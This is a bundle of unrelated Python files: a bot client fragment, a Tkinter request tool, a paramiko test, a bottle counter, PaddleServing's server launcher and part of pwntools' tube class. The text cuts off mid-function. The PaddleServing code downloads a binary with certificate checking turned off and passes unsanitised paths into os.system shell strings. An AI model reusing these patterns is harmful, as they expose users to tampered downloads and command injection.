else:
params['deviceId'] = device_id
r = requests.get(server + "/cloud/json/settingsServer", params=params, headers=http_headers, proxies=_https_proxy)
return r.text
def _check_for_errors(json_response):
"""Check some JSON response for BotEngine errors"""
if not json_response:
raise BotError("No response from the server!", -1)
if json_response['resultCode'] > 0:
msg = "Unknown error!"
if 'resultCodeMessage' in json_response.keys():
msg = json_response['resultCodeMessage']
elif 'resultCodeDesc' in json_response.keys():
msg = json_response['resultCodeDesc']
raise BotError(msg, json_response['resultCode'])
del(json_response['resultCode'])
class BotError(Exception):
"""BotEngine exception to raise and log errors."""
def __init__(self, msg, code):
super(BotError).__init__(type(self))
self.msg = msg
self.code = code
def __str__(self):
return self.msg
def __unicode__(self):
return self.msg
#===============================================================================
# Color Class for CLI
#===============================================================================
class Color:
"""Color your command line output text with Color.WHATEVER and Color.END"""
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
if __name__ == "__main__":
sys.exit(main())
|
main.py
|
import os
import sys
from . import __version__
from .root import (
root,
config,
change_siz,
)
from .menu import bind_menu
from .tab import (
nb,
bind_frame,
delete_curr_tab,
cancel_delete,
create_new_reqtab,
create_new_rsptab,
create_helper,
change_tab_name,
send_request,
save_config,
switch_response_log,
create_test_code,
create_scrapy_code,
get_html_pure_text,
get_xpath_elements,
get_auto_xpath,
get_auto_json,
choice_auto_json,
execute_code,
execute_scrapy_code,
create_js_parse,
create_temp_idle,
create_cmd_idle,
create_encoder,
create_test_code_urllib,
)
from .combinekey import (
bind_ctl_key,
bind_alt_key,
)
# 这里的框架就是目前需要设计处理的图形内容
from .frame import (
helper_window,
request_window,
)
# === 初始化 ===
settings = config['set']
if not settings:
create_helper()
else:
for key,setting in settings.items():
if setting.get('type') == 'request':
tab_id = bind_frame(request_window(setting),key)
if key == config['focus']:
nb.select(tab_id) # 保持最后执行成功时的 tab 焦点
# === 创建/删除/帮助 ===
# 绑定右键菜单
bind_menu(create_new_reqtab,'创建请求标签 [Ctrl+q]')
bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]')
bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]')
bind_menu(save_config, '保存配置快照 [Ctrl+s]')
bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]')
bind_menu(create_helper, '帮助文档标签 [Ctrl+h]')
bind_menu(create_encoder, '创建便捷加密编码窗口')
# 绑定 Ctrl + key 的组合键
bind_ctl_key(create_new_reqtab, 'q')
bind_ctl_key(delete_curr_tab, 'w')
# 撤销 ctrl + shift + w (必须是保存过的配置,并且撤销队列在程序关闭后就清空)
bind_ctl_key(cancel_delete, 'w',shift=True)
bind_ctl_key(change_tab_name, 'e')
bind_ctl_key(save_config, 's')
bind_ctl_key(send_request, 'r')
bind_ctl_key(create_helper, 'h')
bind_ctl_key(create_js_parse, 'j')
bind_ctl_key(create_cmd_idle, '`')
# 绑定 response 事件
bind_alt_key(create_new_rsptab, 'r')
bind_alt_key(create_test_code, 'c') # 生成代码
bind_alt_key(get_html_pure_text, 'd') # 获取文本
bind_alt_key(get_xpath_elements, 'x') # 获取xpath
bind_alt_key(get_auto_xpath, 'f') # 解析路径xpath
bind_alt_key(get_auto_json, 'z') # 分析json列表
bind_alt_key(choice_auto_json, 'q') # 选则json列表
bind_alt_key(execute_code, 'v') # 代码执行
bind_alt_key(create_scrapy_code, 's') # 生成scrapy代码
bind_alt_key(execute_scrapy_code, 'w') # 用自动生成的环境执行scrapy代码
bind_alt_key(create_temp_idle, '`') # 使用临时的idle文本
bind_alt_key(create_test_code_urllib, 'u') # 生成 urllib(py3) 请求的代碼
def algo():
from .frame import encode_window
fr = encode_window()
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
fr.iconbitmap(ico)
fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
fr.bind('<Escape>',lambda *a:fr.master.quit())
fr.bind('<Alt-`>',lambda *a:create_temp_idle())
fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
fr.master.withdraw()
fr.mainloop()
def execute():
argv = sys.argv
if 'e' in argv:
algo()
return
def preimport():
import time
time.sleep(.5) # 需要花点时间导包的部分,用别的线程进行预加载,增加工具顺滑度
try: import js2py
except: pass
try: import execjs
except: pass
import threading
threading.Thread(target=preimport).start()
root.title('vrequest [{}]'.format(__version__))
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
root.iconbitmap(ico)
root.geometry(config.get('siz') or '600x725+100+100')
root.bind('<Configure>',lambda e:change_siz())
root.bind('<Escape>',lambda e:switch_response_log())
root.mainloop()
if __name__ == '__main__':
execute()
|
test_kex_gss.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
# Copyright (C) 2013-2014 science + computing ag
# Author: Sebastian Deiss <sebastian.deiss@t-online.de>
#
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Unit Tests for the GSS-API / SSPI SSHv2 Diffie-Hellman Key Exchange and user
authentication
"""
import socket
import threading
import unittest
import paramiko
class NullServer (paramiko.ServerInterface):
def get_allowed_auths(self, username):
return 'gssapi-keyex'
def check_auth_gssapi_keyex(self, username,
gss_authenticated=paramiko.AUTH_FAILED,
cc_file=None):
if gss_authenticated == paramiko.AUTH_SUCCESSFUL:
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def enable_auth_gssapi(self):
UseGSSAPI = True
return UseGSSAPI
def check_channel_request(self, kind, chanid):
return paramiko.OPEN_SUCCEEDED
def check_channel_exec_request(self, channel, command):
if command != 'yes':
return False
return True
class GSSKexTest(unittest.TestCase):
@staticmethod
def init(username, hostname):
global krb5_principal, targ_name
krb5_principal = username
targ_name = hostname
def setUp(self):
self.username = krb5_principal
self.hostname = socket.getfqdn(targ_name)
self.sockl = socket.socket()
self.sockl.bind((targ_name, 0))
self.sockl.listen(1)
self.addr, self.port = self.sockl.getsockname()
self.event = threading.Event()
thread = threading.Thread(target=self._run)
thread.start()
def tearDown(self):
for attr in "tc ts socks sockl".split():
if hasattr(self, attr):
getattr(self, attr).close()
def _run(self):
self.socks, addr = self.sockl.accept()
self.ts = paramiko.Transport(self.socks, gss_kex=True)
host_key = paramiko.RSAKey.from_private_key_file('tests/test_rsa.key')
self.ts.add_server_key(host_key)
self.ts.set_gss_host(targ_name)
try:
self.ts.load_server_moduli()
except:
print ('(Failed to load moduli -- gex will be unsupported.)')
server = NullServer()
self.ts.start_server(self.event, server)
def test_1_gsskex_and_auth(self):
"""
Verify that Paramiko can handle SSHv2 GSS-API / SSPI authenticated
Diffie-Hellman Key Exchange and user authentication with the GSS-API
context created during key exchange.
"""
host_key = paramiko.RSAKey.from_private_key_file('tests/test_rsa.key')
public_host_key = paramiko.RSAKey(data=host_key.asbytes())
self.tc = paramiko.SSHClient()
self.tc.get_host_keys().add('[%s]:%d' % (self.hostname, self.port),
'ssh-rsa', public_host_key)
self.tc.connect(self.hostname, self.port, username=self.username,
gss_auth=True, gss_kex=True)
self.event.wait(1.0)
self.assert_(self.event.is_set())
self.assert_(self.ts.is_active())
self.assertEquals(self.username, self.ts.get_username())
self.assertEquals(True, self.ts.is_authenticated())
stdin, stdout, stderr = self.tc.exec_command('yes')
schan = self.ts.accept(1.0)
schan.send('Hello there.\n')
schan.send_stderr('This is on stderr.\n')
schan.close()
self.assertEquals('Hello there.\n', stdout.readline())
self.assertEquals('', stdout.readline())
self.assertEquals('This is on stderr.\n', stderr.readline())
self.assertEquals('', stderr.readline())
stdin.close()
stdout.close()
stderr.close()
|
counter.py
|
from bottle import post, run, request
import threading
import time
count = 0
@post('/')
def index():
global count
count += int(request.body.read())
return b''
def show():
prev = 0
while True:
start = time.time()
time.sleep(1)
now = time.time()
dur = now - start
print(int((count - prev) / dur), 'ops')
start = now
prev = count
threading.Thread(target=show).start()
run(host='localhost', port=7000, quiet=True)
|
server.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tarfile
import socket
import paddle_serving_server as paddle_serving_server
from paddle_serving_server.rpc_service import MultiLangServerServiceServicer
from .proto import server_configure_pb2 as server_sdk
from .proto import general_model_config_pb2 as m_config
from .proto import multi_lang_general_model_service_pb2_grpc
import google.protobuf.text_format
import time
from .version import version_tag, version_suffix, device_type
from contextlib import closing
import argparse
import sys
if sys.platform.startswith('win') is False:
import fcntl
import shutil
import platform
import numpy as np
import grpc
import sys
import collections
from multiprocessing import Pool, Process
from concurrent import futures
class Server(object):
def __init__(self):
"""
self.model_toolkit_conf:'list'=[] # The quantity of self.model_toolkit_conf is equal to the InferOp quantity/Engine--OP
self.model_conf:'collections.OrderedDict()' # Save the serving_server_conf.prototxt content (feed and fetch information) this is a map for multi-model in a workflow
self.workflow_fn:'str'="workflow.prototxt" # Only one for one Service/Workflow
self.resource_fn:'str'="resource.prototxt" # Only one for one Service,model_toolkit_fn and general_model_config_fn is recorded in this file
self.infer_service_fn:'str'="infer_service.prototxt" # Only one for one Service,Service--Workflow
self.model_toolkit_fn:'list'=[] # ["general_infer_0/model_toolkit.prototxt"]The quantity is equal to the InferOp quantity,Engine--OP
self.general_model_config_fn:'list'=[] # ["general_infer_0/general_model.prototxt"]The quantity is equal to the InferOp quantity,Feed and Fetch --OP
self.subdirectory:'list'=[] # The quantity is equal to the InferOp quantity, and name = node.name = engine.name
self.model_config_paths:'collections.OrderedDict()' # Save the serving_server_conf.prototxt path (feed and fetch information) this is a map for multi-model in a workflow
"""
self.server_handle_ = None
self.infer_service_conf = None
self.model_toolkit_conf = []
self.resource_conf = None
self.memory_optimization = False
self.ir_optimization = False
self.model_conf = collections.OrderedDict()
self.workflow_fn = "workflow.prototxt"
self.resource_fn = "resource.prototxt"
self.infer_service_fn = "infer_service.prototxt"
self.model_toolkit_fn = []
self.general_model_config_fn = []
self.subdirectory = []
self.cube_config_fn = "cube.conf"
self.workdir = ""
self.max_concurrency = 0
self.num_threads = 2
self.port = 8080
self.precision = "fp32"
self.use_calib = False
self.reload_interval_s = 10
self.max_body_size = 64 * 1024 * 1024
self.module_path = os.path.dirname(paddle_serving_server.__file__)
self.cur_path = os.getcwd()
self.use_local_bin = False
self.mkl_flag = False
self.device = "cpu"
self.gpuid = 0
self.use_trt = False
self.use_lite = False
self.use_xpu = False
self.model_config_paths = collections.OrderedDict()
self.product_name = None
self.container_id = None
def get_fetch_list(self, infer_node_idx=-1):
fetch_names = [
var.alias_name
for var in list(self.model_conf.values())[infer_node_idx].fetch_var
]
return fetch_names
def set_max_concurrency(self, concurrency):
self.max_concurrency = concurrency
def set_num_threads(self, threads):
self.num_threads = threads
def set_max_body_size(self, body_size):
if body_size >= self.max_body_size:
self.max_body_size = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def use_encryption_model(self, flag=False):
self.encryption_model = flag
def set_port(self, port):
self.port = port
def set_precision(self, precision="fp32"):
self.precision = precision
def set_use_calib(self, use_calib=False):
self.use_calib = use_calib
def set_reload_interval(self, interval):
self.reload_interval_s = interval
def set_op_sequence(self, op_seq):
self.workflow_conf = op_seq
def set_op_graph(self, op_graph):
self.workflow_conf = op_graph
def set_memory_optimize(self, flag=False):
self.memory_optimization = flag
def set_ir_optimize(self, flag=False):
self.ir_optimization = flag
def set_product_name(self, product_name=None):
if product_name == None:
raise ValueError("product_name can't be None.")
self.product_name = product_name
def set_container_id(self, container_id):
if container_id == None:
raise ValueError("container_id can't be None.")
self.container_id = container_id
def check_local_bin(self):
if "SERVING_BIN" in os.environ:
self.use_local_bin = True
self.bin_path = os.environ["SERVING_BIN"]
def check_cuda(self):
if os.system("ls /dev/ | grep nvidia > /dev/null") == 0:
pass
else:
raise SystemExit(
"GPU not found, please check your environment or use cpu version by \"pip install paddle_serving_server\""
)
def set_device(self, device="cpu"):
self.device = device
def set_gpuid(self, gpuid=0):
self.gpuid = gpuid
def set_trt(self):
self.use_trt = True
def set_lite(self):
self.use_lite = True
def set_xpu(self):
self.use_xpu = True
def _prepare_engine(self, model_config_paths, device, use_encryption_model):
if self.model_toolkit_conf == None:
self.model_toolkit_conf = []
for engine_name, model_config_path in model_config_paths.items():
engine = server_sdk.EngineDesc()
engine.name = engine_name
# engine.reloadable_meta = model_config_path + "/fluid_time_file"
engine.reloadable_meta = model_config_path + "/fluid_time_file"
os.system("touch {}".format(engine.reloadable_meta))
engine.reloadable_type = "timestamp_ne"
engine.runtime_thread_num = 0
engine.batch_infer_size = 0
engine.enable_batch_align = 0
engine.model_dir = model_config_path
engine.enable_memory_optimization = self.memory_optimization
engine.enable_ir_optimization = self.ir_optimization
engine.use_trt = self.use_trt
engine.use_lite = self.use_lite
engine.use_xpu = self.use_xpu
engine.use_gpu = False
if self.device == "gpu":
engine.use_gpu = True
if os.path.exists('{}/__params__'.format(model_config_path)):
engine.combined_model = True
else:
engine.combined_model = False
if use_encryption_model:
engine.encrypted_model = True
engine.type = "PADDLE_INFER"
self.model_toolkit_conf.append(server_sdk.ModelToolkitConf())
self.model_toolkit_conf[-1].engines.extend([engine])
def _prepare_infer_service(self, port):
if self.infer_service_conf == None:
self.infer_service_conf = server_sdk.InferServiceConf()
self.infer_service_conf.port = port
infer_service = server_sdk.InferService()
infer_service.name = "GeneralModelService"
infer_service.workflows.extend(["workflow1"])
self.infer_service_conf.services.extend([infer_service])
def _prepare_resource(self, workdir, cube_conf):
self.workdir = workdir
if self.resource_conf == None:
self.resource_conf = server_sdk.ResourceConf()
for idx, op_general_model_config_fn in enumerate(
self.general_model_config_fn):
with open("{}/{}".format(workdir, op_general_model_config_fn),
"w") as fout:
fout.write(str(list(self.model_conf.values())[idx]))
for workflow in self.workflow_conf.workflows:
for node in workflow.nodes:
if "dist_kv" in node.name:
self.resource_conf.cube_config_path = workdir
self.resource_conf.cube_config_file = self.cube_config_fn
if cube_conf == None:
raise ValueError(
"Please set the path of cube.conf while use dist_kv op."
)
shutil.copy(cube_conf, workdir)
if "quant" in node.name:
self.resource_conf.cube_quant_bits = 8
self.resource_conf.model_toolkit_path.extend([workdir])
self.resource_conf.model_toolkit_file.extend(
[self.model_toolkit_fn[idx]])
self.resource_conf.general_model_path.extend([workdir])
self.resource_conf.general_model_file.extend(
[op_general_model_config_fn])
#TODO:figure out the meaning of product_name and container_id.
if self.product_name != None:
self.resource_conf.auth_product_name = self.product_name
if self.container_id != None:
self.resource_conf.auth_container_id = self.container_id
def _write_pb_str(self, filepath, pb_obj):
with open(filepath, "w") as fout:
fout.write(str(pb_obj))
def load_model_config(self, model_config_paths_args):
# At present, Serving needs to configure the model path in
# the resource.prototxt file to determine the input and output
# format of the workflow. To ensure that the input and output
# of multiple models are the same.
if isinstance(model_config_paths_args, str):
model_config_paths_args = [model_config_paths_args]
for single_model_config in model_config_paths_args:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
if isinstance(model_config_paths_args, list):
# If there is only one model path, use the default infer_op.
# Because there are several infer_op type, we need to find
# it from workflow_conf.
default_engine_types = [
'GeneralInferOp',
'GeneralDistKVInferOp',
'GeneralDistKVQuantInferOp',
'GeneralDetectionOp',
]
# now only support single-workflow.
# TODO:support multi-workflow
model_config_paths_list_idx = 0
for node in self.workflow_conf.workflows[0].nodes:
if node.type in default_engine_types:
if node.name is None:
raise Exception(
"You have set the engine_name of Op. Please use the form {op: model_path} to configure model path"
)
f = open("{}/serving_server_conf.prototxt".format(
model_config_paths_args[model_config_paths_list_idx]),
'r')
self.model_conf[
node.name] = google.protobuf.text_format.Merge(
str(f.read()), m_config.GeneralModelConfig())
self.model_config_paths[
node.name] = model_config_paths_args[
model_config_paths_list_idx]
self.general_model_config_fn.append(
node.name + "/general_model.prototxt")
self.model_toolkit_fn.append(node.name +
"/model_toolkit.prototxt")
self.subdirectory.append(node.name)
model_config_paths_list_idx += 1
if model_config_paths_list_idx == len(
model_config_paths_args):
break
#Right now, this is not useful.
elif isinstance(model_config_paths_args, dict):
self.model_config_paths = collections.OrderedDict()
for node_str, path in model_config_paths_args.items():
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
self.model_config_paths[node.name] = path
print("You have specified multiple model paths, please ensure "
"that the input and output of multiple models are the same.")
f = open("{}/serving_server_conf.prototxt".format(path), 'r')
self.model_conf[node.name] = google.protobuf.text_format.Merge(
str(f.read()), m_config.GeneralModelConfig())
else:
raise Exception(
"The type of model_config_paths must be str or list or "
"dict({op: model_path}), not {}.".format(
type(model_config_paths_args)))
# check config here
# print config here
def use_mkl(self, flag):
self.mkl_flag = flag
def get_device_version(self):
avx_flag = False
mkl_flag = self.mkl_flag
r = os.system("cat /proc/cpuinfo | grep avx > /dev/null 2>&1")
if r == 0:
avx_flag = True
if avx_flag:
if mkl_flag:
device_version = "cpu-avx-mkl"
else:
device_version = "cpu-avx-openblas"
else:
if mkl_flag:
print(
"Your CPU does not support AVX, server will running with noavx-openblas mode."
)
device_version = "cpu-noavx-openblas"
return device_version
def get_serving_bin_name(self):
if device_type == "0":
device_version = self.get_device_version()
elif device_type == "1":
if version_suffix == "101" or version_suffix == "102":
device_version = "gpu-" + version_suffix
else:
device_version = "gpu-cuda" + version_suffix
elif device_type == "2":
device_version = "xpu-" + platform.machine()
return device_version
def download_bin(self):
os.chdir(self.module_path)
need_download = False
#acquire lock
version_file = open("{}/version.py".format(self.module_path), "r")
folder_name = "serving-%s-%s" % (self.get_serving_bin_name(),
version_tag)
tar_name = "%s.tar.gz" % folder_name
bin_url = "https://paddle-serving.bj.bcebos.com/bin/%s" % tar_name
self.server_path = os.path.join(self.module_path, folder_name)
download_flag = "{}/{}.is_download".format(self.module_path,
folder_name)
fcntl.flock(version_file, fcntl.LOCK_EX)
if os.path.exists(download_flag):
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
return
if not os.path.exists(self.server_path):
os.system("touch {}/{}.is_download".format(self.module_path,
folder_name))
print('Frist time run, downloading PaddleServing components ...')
r = os.system('wget ' + bin_url + ' --no-check-certificate')
if r != 0:
if os.path.exists(tar_name):
os.remove(tar_name)
raise SystemExit(
'Download failed, please check your network or permission of {}.'
.format(self.module_path))
else:
try:
print('Decompressing files ..')
tar = tarfile.open(tar_name)
tar.extractall()
tar.close()
except:
if os.path.exists(exe_path):
os.remove(exe_path)
raise SystemExit(
'Decompressing failed, please check your permission of {} or disk space left.'
.format(self.module_path))
finally:
os.remove(tar_name)
#release lock
version_file.close()
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
use_encryption_model=False,
cube_conf=None):
if workdir == None:
workdir = "./tmp"
os.system("mkdir -p {}".format(workdir))
else:
os.system("mkdir -p {}".format(workdir))
for subdir in self.subdirectory:
os.system("mkdir -p {}/{}".format(workdir, subdir))
os.system("touch {}/{}/fluid_time_file".format(workdir, subdir))
if not self.port_is_available(port):
raise SystemExit("Port {} is already used".format(port))
self.set_port(port)
self._prepare_resource(workdir, cube_conf)
self._prepare_engine(self.model_config_paths, device,
use_encryption_model)
self._prepare_infer_service(port)
self.workdir = workdir
infer_service_fn = "{}/{}".format(workdir, self.infer_service_fn)
self._write_pb_str(infer_service_fn, self.infer_service_conf)
workflow_fn = "{}/{}".format(workdir, self.workflow_fn)
self._write_pb_str(workflow_fn, self.workflow_conf)
resource_fn = "{}/{}".format(workdir, self.resource_fn)
self._write_pb_str(resource_fn, self.resource_conf)
for idx, single_model_toolkit_fn in enumerate(self.model_toolkit_fn):
model_toolkit_fn = "{}/{}".format(workdir, single_model_toolkit_fn)
self._write_pb_str(model_toolkit_fn, self.model_toolkit_conf[idx])
def port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def run_server(self):
# just run server with system command
# currently we do not load cube
self.check_local_bin()
if not self.use_local_bin:
self.download_bin()
# wait for other process to download server bin
while not os.path.exists(self.server_path):
time.sleep(1)
else:
print("Use local bin : {}".format(self.bin_path))
#self.check_cuda()
# Todo: merge CPU and GPU code, remove device to model_toolkit
if self.device == "cpu" or self.device == "arm":
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-precision {} " \
"-use_calib {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.precision,
self.use_calib,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.max_body_size)
else:
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-precision {} " \
"-use_calib {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-gpuid {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.precision,
self.use_calib,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.gpuid,
self.max_body_size)
print("Going to Run Comand")
print(command)
os.system(command)
class MultiLangServer(object):
def __init__(self):
self.bserver_ = Server()
self.worker_num_ = 4
self.body_size_ = 64 * 1024 * 1024
self.concurrency_ = 100000
self.is_multi_model_ = False # for model ensemble, which is not useful right now.
def set_max_concurrency(self, concurrency):
self.concurrency_ = concurrency
self.bserver_.set_max_concurrency(concurrency)
def set_device(self, device="cpu"):
self.device = device
def set_num_threads(self, threads):
self.worker_num_ = threads
self.bserver_.set_num_threads(threads)
def set_max_body_size(self, body_size):
self.bserver_.set_max_body_size(body_size)
if body_size >= self.body_size_:
self.body_size_ = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def use_encryption_model(self, flag=False):
self.encryption_model = flag
def set_port(self, port):
self.gport_ = port
def set_precision(self, precision="fp32"):
self.precision = precision
def set_use_calib(self, use_calib=False):
self.use_calib = use_calib
def set_reload_interval(self, interval):
self.bserver_.set_reload_interval(interval)
def set_op_sequence(self, op_seq):
self.bserver_.set_op_sequence(op_seq)
def set_op_graph(self, op_graph):
self.bserver_.set_op_graph(op_graph)
def use_mkl(self, flag):
self.bserver_.use_mkl(flag)
def set_memory_optimize(self, flag=False):
self.bserver_.set_memory_optimize(flag)
def set_ir_optimize(self, flag=False):
self.bserver_.set_ir_optimize(flag)
def set_gpuid(self, gpuid=0):
self.bserver_.set_gpuid(gpuid)
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
else:
raise Exception("The type of model_config_paths must be str or list"
", not {}.".format(type(server_config_dir_paths)))
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.bserver_.load_model_config(server_config_dir_paths)
if client_config_path is None:
#now dict is not useful.
if isinstance(server_config_dir_paths, dict):
self.is_multi_model_ = True
client_config_path = []
for server_config_path_items in list(
server_config_dir_paths.items()):
client_config_path.append(server_config_path_items[1])
elif isinstance(server_config_dir_paths, list):
self.is_multi_model_ = False
client_config_path = server_config_dir_paths
else:
raise Exception(
"The type of model_config_paths must be str or list or "
"dict({op: model_path}), not {}.".format(
type(server_config_dir_paths)))
if isinstance(client_config_path, str):
client_config_path = [client_config_path]
elif isinstance(client_config_path, list):
pass
else: # dict is not support right now.
raise Exception(
"The type of client_config_path must be str or list or "
"dict({op: model_path}), not {}.".format(
type(client_config_path)))
if len(client_config_path) != len(server_config_dir_paths):
raise Warning(
"The len(client_config_path) is {}, != len(server_config_dir_paths) {}."
.format(len(client_config_path), len(server_config_dir_paths)))
self.bclient_config_path_list = client_config_path
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
use_encryption_model=False,
cube_conf=None):
if not self._port_is_available(port):
raise SystemExit("Prot {} is already used".format(port))
default_port = 12000
self.port_list_ = []
for i in range(1000):
if default_port + i != port and self._port_is_available(default_port
+ i):
self.port_list_.append(default_port + i)
break
self.bserver_.prepare_server(
workdir=workdir,
port=self.port_list_[0],
device=device,
use_encryption_model=use_encryption_model,
cube_conf=cube_conf)
self.set_port(port)
def _launch_brpc_service(self, bserver):
bserver.run_server()
def _port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
return result != 0
def run_server(self):
p_bserver = Process(
target=self._launch_brpc_service, args=(self.bserver_, ))
p_bserver.start()
options = [('grpc.max_send_message_length', self.body_size_),
('grpc.max_receive_message_length', self.body_size_)]
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.worker_num_),
options=options,
maximum_concurrent_rpcs=self.concurrency_)
multi_lang_general_model_service_pb2_grpc.add_MultiLangGeneralModelServiceServicer_to_server(
MultiLangServerServiceServicer(
self.bclient_config_path_list, self.is_multi_model_,
["0.0.0.0:{}".format(self.port_list_[0])]), server)
server.add_insecure_port('[::]:{}'.format(self.gport_))
server.start()
p_bserver.join()
server.wait_for_termination()
|
tube.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
import logging
import re
import six
import string
import subprocess
import sys
import threading
import time
from six.moves import range
from pwnlib import atexit
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.timeout import Timeout
from pwnlib.tubes.buffer import Buffer
from pwnlib.util import fiddling
from pwnlib.util import misc
from pwnlib.util import packing
class tube(Timeout, Logger):
"""
Container of all the tube functions common to sockets, TTYs and SSH connetions.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = b'\n'
def __init__(self, timeout = default, level = None, *a, **kw):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer(*a, **kw)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = None, timeout = default):
r"""recv(numb = 4096, timeout = default) -> bytes
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A bytes object containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: b'Hello, world'
>>> t.recv() == b'Hello, world'
True
>>> t.unrecv(b'Woohoo')
>>> t.recv() == b'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
b'Hello, world'
"""
numb = self.buffer.get_fill_size(numb)
return self._recv(numb, timeout) or b''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'hello'
>>> t.recv()
b'hello'
>>> t.recv()
b'hello'
>>> t.unrecv(b'world')
>>> t.recv()
b'world'
>>> t.recv()
b'hello'
"""
data = context._encode(data)
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: b'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
b'abc'
>>> len(t.buffer)
3
"""
data = b''
with self.local(timeout):
data = self.recv_raw(self.buffer.get_fill_size())
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if len(set(data)) == 1 and len(data) > 1:
self.indented('%r * %#x' % (data[0], len(data)), level = logging.DEBUG)
elif all(c in string.printable.encode() for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = None, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
Receives one chunk of from the internal buffer or from the OS if the
buffer is empty.
"""
numb = self.buffer.get_fill_size(numb)
# No buffered data, could not put anything in the buffer
